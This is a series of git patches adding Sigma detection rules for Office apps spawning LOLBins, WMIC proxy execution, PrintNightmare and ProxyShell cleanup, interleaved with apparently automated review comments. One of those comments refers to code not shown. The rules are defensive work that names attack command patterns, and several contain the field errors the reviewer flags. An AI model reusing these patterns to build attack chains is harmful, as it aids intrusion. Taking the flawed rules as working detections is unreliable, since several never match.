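Review bot: `fixWildcards` has no docstring and its only comment is a doubt, so the rewrite it applies is undocumented: a two-backslash suffix is shortened to one backslash followed by `*`, and a two-backslash prefix is removed unless the value starts with four backslashes. The second rewrite silently removes the path-separator anchor from a value such as `\name.exe` once `escapeCharacter` has doubled its backslash, so the value then also matches `othername.exe`; if that is deliberate for Carbon Black's path tokenization it deserves a sentence, and since the exact input depends on `escapeCharacter` and `cleanWhitespace`, which run just before it in `cleanValue` and are outside this hunk, a unit test with one example per case would pin the intent. A docstring of two or three lines stating the two rewrites and why Carbon Black needs them would replace the `# prob a better way ... fail fast!` comment, which should otherwise become a `# TODO:` naming the modifier-based approach.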
diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml new file mode 100644 index 00000000..6b77a997 --- /dev/null +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -0,0 +1,39 @@ +title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + NewProcessName|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentProcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml new file mode 100644 index 00000000..90d5557e --- /dev/null +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
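Review bot: This rule, and the sibling rules added in this commit and the next two (the files under `rules/windows/process_creation/` and `rules/windows/sysmon/` with the same header), share defects that are likely to trip the repository's rule tests and converters: `Date: 2021/23/8` should be `date: 2021/08/23` (lowercase key, `YYYY/MM/DD`), there is no `id`, `attack.defence_evasion` should be `attack.defense_evasion`, `falsepositives` holds an empty string, `condition` uses uppercase `AND` where every other rule on this page writes `and`, and the `description:` entry placed under `detection:` becomes an unused search identifier rather than documentation (move it into a `# comment`). The `endswith` values `'regsvr32'`, `'rundll32'`, `'msiexec'`, `'mshta'`, `'verclsid'` lack the `.exe` suffix, so they never match a real `NewProcessName`/`Image` value; write them as `'\regsvr32.exe'` and so on. Under `category: process_creation` the repository uses the generic `Image`/`CommandLine`/`ParentImage` fields (see the Cobalt Strike and CMSTP rules in this series) and lets the backend map them, so the `EventLog`/`EventID` selections and the raw `NewProcessName`/`ParentProcessName` names are redundant with the logsource; `product: Windows` should be lowercase and `service: security` dropped in favour of the category alone. Rule-specific problems are noted on the individual hunks.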
@@ -0,0 +1,37 @@ +title: LOLBins process creations with Wmiprvse parent process. (Security Event Logs) +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + NewProcessName|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentProcessName|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml new file mode 100644 index 00000000..b54db391 --- /dev/null +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml 
@@ -0,0 +1,47 @@ +title: Monitor Excel from proxy executing regsvr32 with payload (Security Event Logs) +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + ProcessCommandLine: + - '*regsvr32*' + - '*rundll32*' + - '*msiexec*' + - '*mshta*' + - '*verclsid*' + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + ParentProcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml new file mode 100644 index 00000000..df25ef11 --- /dev/null 
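Review bot: `selection5` uses `processCommandLine|contains|all` while `selection2` and `selection3` use `ProcessCommandLine`, so the lowercase variant will not map to the same field and the `all` constraint never matches; both should be `CommandLine` under `category: process_creation`. `selection3` is a list of two maps, which ORs `ProcessName` and `ProcessCommandLine`, and the `'*wmic *'` entry has no path anchor, so a comment stating that the OR is intentional would help. The file name `Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml` contains a space, which no other rule path on this page does except one in a later commit; the sysmon copy in the next commit already uses an underscore. The shared header, date, tag and `.exe`-suffix problems are raised on the first rule of this commit.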
+++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -0,0 +1,36 @@ +title: Office Applications Spawning WMI command-line (Security Event Logs) +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + service: security + category: process_creation +detection: + description: Add more office applications to the rule logic of choice + selection1: + - EventLog: security + selection2: + - EventID: 4688 + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + - ParentProcessName: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 AND selection4 +falsepositives: +- "" +level: high \ No newline at end of file From 6c9b2a2f374b44d0f011b53fdd824b68bb1fd925 Mon Sep 17 00:00:00 2001 
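Review bot: `selection4` uses `ParentProcessName:` with bare values `winword.exe`, `excel.exe`, `powerpnt.exe` and no `|endswith` modifier or wildcard, which is an exact match against a full path and so never fires; use `ParentProcessName|endswith: - '\winword.exe'` (or `ParentImage|endswith` under `category: process_creation`). `selection1` and `selection2` wrap a single map in a list, which is valid but inconsistent with the map form in the sibling rules, and `selection3` ORs `ProcessName` and `ProcessCommandLine` as noted on the previous rule. The shared header and tag problems are raised on the first rule of this commit.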
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Mon, 30 Aug 2021 21:48:03 -0600 Subject: [PATCH 0634/1367] Add files via upload --- ...ocess_Creations_by_Office_applications.yml | 39 +++++++++++++++ ...creations_with_Wmiprvse_parent_process.yml | 37 ++++++++++++++ ..._proxy_executing_regsvr32_with_payload.yml | 49 +++++++++++++++++++ ...ice_applications_using_file_extentions.yml | 44 +++++++++++++++++ ...Applications_Spawning_WMI_command-line.yml | 37 ++++++++++++++ 5 files changed, 206 insertions(+) create mode 100644 rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml create mode 100644 rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml create mode 100644 rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml create mode 100644 rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml create mode 100644 rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml new file mode 100644 index 00000000..db13196c --- /dev/null +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml 
@@ -0,0 +1,39 @@ +title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml new file mode 100644 index 00000000..3acabbea --- /dev/null +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
@@ -0,0 +1,37 @@ +title: LOLBins process creations with Wmiprvse parent process(sysmon) +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "FPs are possible here, but some LOLBins weren't excluded for obvious reasons." +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml new file mode 100644 index 00000000..71e30907 --- /dev/null +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml 
@@ -0,0 +1,49 @@ +title: Monitor Excel from proxy executing regsvr32 with payload (Sysmon) +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + - Image: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + CommandLine|contains: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection4: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- "" +level: high \ No newline at end of file 
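Review bot: `selection2` and `selection5` reference `ProcessCommandLine`/`processCommandLine`, which are not Sysmon event 1 fields; the same hunk's `selection3` already uses the correct `CommandLine`, so the `all` constraint in `selection5` (`process`, `create`, `call`) and that OR entry in `selection2` never match. Rename both to `CommandLine` and drop the `EventLog` pseudo-field. `Image: '*\wbem\WMIC.exe'` works via the wildcard, but `Image|endswith: '\wbem\WMIC.exe'` is the form used elsewhere on this page. The shared header and tag problems are raised on the first rule of the previous commit.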
diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml new file mode 100644 index 00000000..61716031 --- /dev/null +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -0,0 +1,44 @@ +title: monitor executable and script files creation by Office applications, using file extentions (Sysmon). +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: Please add more file extentions to the logic of your choice. + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + TargetFileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml new file mode 100644 index 00000000..fbeedaad --- /dev/null 
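Review bot: `selection3` uses `TargetFileName|endswith`, but the Sysmon event 11 field is spelled `TargetFilename`, so with the `AND` condition this rule never matches; correct the field name. The rule is a file-creation detection (`EventID: 11`) yet sits under `category: process_creation`, which makes a backend map it to process-creation events; use `category: file_event` with `product: windows` and drop the `EventLog`/`EventID` selection. The shared header, date and tag problems are raised on the first rule of the previous commit.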
+++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -0,0 +1,37 @@ +title: Office Applications Spawning WMI command-line (sysmon) +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + service: sysmon + category: process_creation +detection: + description: Add more office applications to the rule logic of choice + selection1: + EventLog: Microsoft-Windows-Sysmon/Operational + EventID: 1 + selection2: + - Image: '\wbem\WMIC.exe' + - CommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + - ParentPrcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- "" +level: high \ No newline at end of file From e913032865373599f07633f696220263b6c7affc Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Mon, 30 Aug 2021 21:50:16 -0600 Subject: [PATCH 0635/1367] Add files via upload --- ...mmand_execution_by_Office_Applications.yml | 32 ++++++++++++ ...ice_applications_using_file_extentions.yml | 49 +++++++++++++++++++ 2 files changed, 81 insertions(+) create mode 100644 rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml create mode 100644 rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
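Review bot: `selection2`'s first entry `Image: '\wbem\WMIC.exe'` has no wildcard or modifier and is therefore an exact match against the full image path, so it never fires; the sibling rule in this commit uses `'*\wbem\WMIC.exe'`, and `Image|endswith: '\wbem\WMIC.exe'` is clearer still. `selection3` uses `ParentPrcessName|endswith` (typo) where the Sysmon field is `ParentImage`, as the sibling rule uses, and wraps the single map in a list. The shared header and tag problems are raised on the first rule of the previous commit.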
diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml new file mode 100644 index 00000000..565467ed --- /dev/null +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -0,0 +1,32 @@ +title: Monitor WMI "Win32_Process::Create" command execution by Office Applications. +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: EndPoint Detection Logs + category: process_creation +detection: + description: Add more office applications to the rule logic of choice + selection1: + EventLog: EDR + EventType: WMIExecution + WMIcommand: '*Win32_Process\:\:Create*' + selection2: + - Image: + - '*\winword.exe' + - '*\excel.exe' + - '*\powerpnt.exe' + condition: selection1 AND selection2 +falsepositives: +- "" +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml new file mode 100644 index 00000000..c4293b6a --- /dev/null +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
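Review bot: `product: EndPoint Detection Logs` is not a logsource value a backend configuration will match, and `EventLog: EDR`, `EventType: WMIExecution` and `WMIcommand` are product-specific field names that nothing on this page defines, so the rule cannot convert; either name the actual product and document the fields in a `definition:` line under `logsource`, or hold the rule until a logsource exists. In `'*Win32_Process\:\:Create*'` the backslashes are kept literally by Sigma (only `*`, `?` and `\` are escapable), so the pattern looks for `\:\:` and misses `Win32_Process::Create`; write `'*Win32_Process::Create*'`. The shared header and tag problems are raised on the first rule of the earlier commit.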
@@ -0,0 +1,49 @@ +title: monitor executable and script files creation by Office applications, using file extensions and Magic Bytes (EDR). +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +references: +- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ +- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Idea by: Vadim Khrykov" +tags: +- attack.t1204.002 +- attack.t1047 +- attack.t1218.010 +- attack.execution +- attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + description: Please add more file extentions and magic bytes to the logic of your choice. + selection1: + EventType: + - FileCreate + - FileRename + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + FileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + selection4: + FileMagicBytes|startswith: + - "4D5A" + condition: selection1 AND selection2 AND (selection3 OR selection4) +falsepositives: +- "" +level: high \ No newline at end of file From e2bfaea10fcb318a1b7e236e41b6bd5d9c9dab22 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 31 Aug 2021 11:35:54 +0545 Subject: [PATCH 0636/1367] Added new malwarebytes reference for Cab File Expansion rule --- rules/windows/process_creation/sysmon_expand_cabinet_files.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml index 8b9f3f8b..ca64083b 100644 --- a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml 
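Review bot: `selection3` and `selection4` use `FileName|endswith` and `FileMagicBytes|startswith`, and `selection1` uses `EventType`, none of which are Sysmon event 11 fields (the file path there is `TargetFilename`), so with the `AND` condition the rule never matches on the declared `service: Sysmon`. If the magic-bytes and rename fields come from an EDR product, the logsource should name that product and list the fields in a `definition:`; otherwise reduce the rule to the Sysmon field and `category: file_event`. The shared header and tag problems are raised on the first rule of the earlier commit.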
+++ b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml @@ -3,9 +3,11 @@ status: experimental id: 9f107a84-532c-41af-b005-8d12a607639f author: Bhabesh Raj date: 2021/07/30 +modified: 2021/08/31 description: Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack references: - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll + - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ tags: - attack.execution - attack.t1218 From 89e21c69ef78f9e152537a333555387be36295be Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 31 Aug 2021 09:07:54 +0200 Subject: [PATCH 0637/1367] fix detection --- rules/windows/powershell/powershell_invoke_nightmare.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml index 64e93f5a..a98b9bba 100644 --- a/rules/windows/powershell/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -1,8 +1,9 @@ title: PrintNightmare Powershell Exploitation id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf -status: experimental +status: test description: Detects Commandlet name for PrintNightmare exploitation. date: 2021/08/09 +modified: 2021/08/31 references: - https://github.com/calebstewart/CVE-2021-1675 author: Max Altgelt, Tobias Michalski @@ -13,7 +14,7 @@ logsource: detection: selection: EventID: 4104 - ScriptBlockText: Invoke-Nightmare + ScriptBlockText|contains: Invoke-Nightmare condition: selection falsepositives: - Unknown From 911c45201a8082a6c08fd6004bf351db723c16f9 Mon Sep 17 00:00:00 2001 
From: Bhabesh Rai Date: Tue, 31 Aug 2021 13:02:53 +0545 Subject: [PATCH 0638/1367] Added -F option support --- rules/windows/process_creation/sysmon_expand_cabinet_files.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml index ca64083b..b05acd63 100644 --- a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml +++ b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml @@ -21,6 +21,7 @@ detection: CommandLine|contains: - '.cab' - '/F:' + - '-F:' - 'C:\ProgramData\' #Suspicious paths to curb FPs if any - 'C:\Public\' - '\AppData\Local\Temp\' From abf40ecfbc1155de368083988918a7fb8c7814fe Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:50:11 +0200 Subject: [PATCH 0639/1367] fix: typo in URL --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 730c2ed0..ce92d132 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -573,7 +573,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'title' fields. Please check: https://github.com/SimaHQ/sigma/wiki/Rule-Creation-Guide#title") + "There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title") def test_invalid_logsource_attributes(self): faulty_rules = [] From 3155f7172db676163f665ccf01f5cea762b9ebe4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:51:16 +0200 Subject: [PATCH 0640/1367] detection for proxyshell MSF module --- ...hange_proxyshell_remove_mailbox_export.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml 
diff --git a/rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml new file mode 100644 index 00000000..d9c8fcfe --- /dev/null +++ b/rules/windows/other/win_exchange_proxyshell_remove_mailbox_export.yml @@ -0,0 +1,23 @@ +title: Remove Exported Mailbox from Exchange Webserver +id: 09570ae5-889e-43ea-aac0-0e1221fb3d95 +status: experimental +description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit +references: + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 +author: Christian Burkard +date: 2021/08/27 +logsource: + service: msexchange-management + product: windows +detection: + command: + - 'Remove-MailboxExportRequest' + - ' -Identity ' + - ' -Confirm "False"' + condition: all of command +falsepositives: + - unknown +level: high +tags: + - attack.defense_evasion + - attack.t1070 From 50b8ca51109cd26de16de684319de063e571c40a Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:20:39 +0200 Subject: [PATCH 0641/1367] add more COM interfaces and sharpen rule logic --- .../win_cmstp_com_object_access.yml | 25 +++++++++++-------- 1 file changed, 15 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/win_cmstp_com_object_access.yml b/rules/windows/process_creation/win_cmstp_com_object_access.yml index 877d398a..f0dc77b3 100644 --- a/rules/windows/process_creation/win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/win_cmstp_com_object_access.yml 
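Review bot: `condition: all of command` applies `all of` to a single keyword list, and the AND-over-list-items behaviour this relies on is, as far as I can tell, a sigmac-specific extension rather than part of the `X of Y` semantics in the Sigma specification, so other converters will treat `command` as one OR-ed keyword selection and the rule will fire on any management log line containing ` -Identity `. If all three strings must be present, either express that with a field and `|contains|all` where the `msexchange-management` mapping provides one, or record the dependency with `# relies on sigmac treating 'all of <list>' as AND over the list items`. `falsepositives: - unknown` is lowercase where the other rules in this series write `Unknown`.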
@@ -1,7 +1,7 @@
 title: CMSTP UAC Bypass via COM Object Access
 id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253
 status: stable
-description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects
+description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
 tags:
 - attack.execution
 - attack.defense_evasion
@@ -12,23 +12,28 @@ tags:
 - attack.t1191 # an old one
 - attack.g0069
 - car.2019-04-001
-author: Nik Seetharaman
